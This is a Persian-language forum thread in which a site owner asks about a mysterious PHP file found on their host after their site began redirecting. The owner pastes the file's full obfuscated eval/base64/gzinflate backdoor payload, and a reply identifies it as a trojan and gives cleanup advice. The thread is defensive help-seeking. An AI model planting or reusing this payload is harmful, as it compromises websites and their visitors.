AmiRoo 18 ارسال شده در مرداد 20، 1397 گزارش اشتراک گذاری ارسال شده در مرداد 20، 1397 دروددوستان سایتم به طور خودکار ریدایکت میشد به آدرس دیگه ,الان چک کردم داخل هاست یک فایل با نام " 4gmhx4y5p6.php " ایجاد شده <?php eval("\n\$dgreusdi = intval(__LINE__) * 337;"); $a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf"; $a = str_replace($dgreusdi, "E", $a); eval (gzinflate(base64_decode($a))); با محتویات بالا ممنونم یشم بگید بخاطر استفاده از چی بوده و مربوط به چه سایتی هست میشه فهمید از چه طریقی اضافه شده؟ لینک به دیدگاه به اشتراک گذاری در سایت های دیگر More sharing options...
AmiRoo 18 ارسال شده در مرداد 20، 1397 مالک گزارش اشتراک گذاری ارسال شده در مرداد 20، 1397 یک فایل دیگه با نام " .htaccess.171205052320.orig " و " .listing " ایجاد شدن که قابل ویرایش نیستن ( 4gmhx4y5p6.php ) بود اما این 2تا خیر... لینک به دیدگاه به اشتراک گذاری در سایت های دیگر More sharing options...
Masih 6,279 ارسال شده در مرداد 20، 1397 گزارش اشتراک گذاری ارسال شده در مرداد 20، 1397 درود. همون کد اول رو اگه به صورت یک فایل php ذیره کنید داخل سیستم، آنتی ویروس اونو به عنوان تروجان شناسایی می کنه! مشکل از افزونه هایی هست نال شدن. نال کننده ها گاهی اوقات ممکنه کدهای مخرب رو داخل افزونه های در حال انتشار قرار بدن. متاسفانه برای فهمیدن اینکه کدوم افزونه مشکل ساز هست، باید کدنویسی رو تک تک چک کرد و هر مورد مشکوکی رو حذف کرد از افزونه. گاهی اوقات هم هکرها زمانی که سایت رو هک می کنند و از طریقی تونستند نفوذ کنند، یک فایل مانند این کدهایی که گفتید تحت نام Backdoor قرار میدن تا دسترسی داشته باشند! در پنل هاستتون از امکان آنتی ویروس استفاده کنید و یکبار کل هاست و فایل ها رو اسکن کنید. اگر وردپرس هست سایتتون، از افزونه های امنیتی مانند Wordfence استفاده کنید و کل سایت و فایل ها رو اسکن کنید. موارد مشکوک احتمال داره مشخص بشن (اگه مشکل از کدهای مخرب افزونه ها باشه) راه حل پیشنهادی: از دیتابیس سایت بک آپ بگیرید بک آپ جداگانه ای از افزونه ها و قالب هاتون بگیرید. CMS رو مجددا نصب کنید. قالب ها و افزونه ها رو تا حد امکان از منابع معتبر دانلود کنید. در نهایت اگر باز هم چنین مشکلی پیش اومد، مشکل از افزونه هاتون هست که باید یک متخصص امنیت سایتتون رو در قبال هزینه ی بالا آنالیز کنه موفق باشید لینک به دیدگاه به اشتراک گذاری در سایت های دیگر More sharing options...
AmiRoo 18 ارسال شده در مرداد 22، 1397 مالک گزارش اشتراک گذاری ارسال شده در مرداد 22، 1397 در در 20 مرداد 1397 در 14:00، Masih گفته است : درود. همون کد اول رو اگه به صورت یک فایل php ذیره کنید داخل سیستم، آنتی ویروس اونو به عنوان تروجان شناسایی می کنه! مشکل از افزونه هایی هست نال شدن. نال کننده ها گاهی اوقات ممکنه کدهای مخرب رو داخل افزونه های در حال انتشار قرار بدن. متاسفانه برای فهمیدن اینکه کدوم افزونه مشکل ساز هست، باید کدنویسی رو تک تک چک کرد و هر مورد مشکوکی رو حذف کرد از افزونه. گاهی اوقات هم هکرها زمانی که سایت رو هک می کنند و از طریقی تونستند نفوذ کنند، یک فایل مانند این کدهایی که گفتید تحت نام Backdoor قرار میدن تا دسترسی داشته باشند! در پنل هاستتون از امکان آنتی ویروس استفاده کنید و یکبار کل هاست و فایل ها رو اسکن کنید. اگر وردپرس هست سایتتون، از افزونه های امنیتی مانند Wordfence استفاده کنید و کل سایت و فایل ها رو اسکن کنید. موارد مشکوک احتمال داره مشخص بشن (اگه مشکل از کدهای مخرب افزونه ها باشه) راه حل پیشنهادی: از دیتابیس سایت بک آپ بگیرید بک آپ جداگانه ای از افزونه ها و قالب هاتون بگیرید. CMS رو مجددا نصب کنید. قالب ها و افزونه ها رو تا حد امکان از منابع معتبر دانلود کنید. در نهایت اگر باز هم چنین مشکلی پیش اومد، مشکل از افزونه هاتون هست که باید یک متخصص امنیت سایتتون رو در قبال هزینه ی بالا آنالیز کنه موفق باشید ممنون ,جالبه فقط روی بعضی سیستم ها اونم فقط موزیلا این طوری میشه الان هم میشه اما روی 2تا سیستم دیدم من بقیه سیستم ها نه ! چک کنید شما : belowfood.com لینک به دیدگاه به اشتراک گذاری در سایت های دیگر More sharing options...
Masih 6,279 ارسال شده در مرداد 22، 1397 گزارش اشتراک گذاری ارسال شده در مرداد 22، 1397 در 2 ساعت قبل، AmiRoo گفته است : ممنون ,جالبه فقط روی بعضی سیستم ها اونم فقط موزیلا این طوری میشه الان هم میشه اما روی 2تا سیستم دیدم من بقیه سیستم ها نه ! چک کنید شما : belowfood.com درود مجدد. چک کردم با موزیلا ، کروم و IE و Edge هیچ مشکلی نبود و سایت به خوبی باز شد. لینک به دیدگاه به اشتراک گذاری در سایت های دیگر More sharing options...
پست های پیشنهاد شده
بایگانی شده
این موضوع بایگانی و قفل شده و دیگر امکان ارسال پاسخ نیست.